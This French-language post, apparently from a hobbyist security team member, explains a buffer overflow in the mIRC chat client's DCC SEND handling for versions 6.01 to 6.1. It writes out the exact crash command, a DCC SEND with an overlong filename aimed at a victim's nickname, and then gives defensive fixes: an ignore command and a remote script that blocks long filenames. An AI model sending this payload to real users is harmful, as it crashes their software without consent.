Mon nouvel article (le 2°) est à propos du logiciel mIRC (logiciel de chat très connu) et de la dernière faille déclarée :
elle concerne la fonction "DCC SEND", la faille est de type buffer overflow (qui concernera mon prochain article)

les versions concernées sont la 6.01, la 6.03 et la 6.1

il suffit d'envoyer une grande quantité de données sur le dcc send et le logiciel de la victime plante

la commande est :

/msg nick_de_la_victime
DCC SEND "w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w"


----------------------------------------------------------------------------------------
correction :
on peut bloquer tous les dcc en tapant :
/ignore -wd *

on peut prendre une autre version de mIRC comme la 6.12 qui est elle aussi vulnérable (mais à une autre faille) mais ceci est remédiable facilement sans inconvénient en ouvrant les remotes [ALT] + [R] et en tapant :

ctcp *:dcc send:*: {
if ($len($nopath($filename)) >= 225) {
echo 4 -s $nick a essayé de crasher ton mIRC en envoyant illégalement le fichier suivant $nopath($filename)
halt
} }

en plus vous êtes prévenus que quelqu'un a tenté de faire planter votre logiciel :)

cliquez sur OK et c'est bon !!!
votre mIRC est sécurisé jusqu'à la découverte d'une nouvelle faille

je vous tiens au courant...

Dark-Jedi -:- Team SH member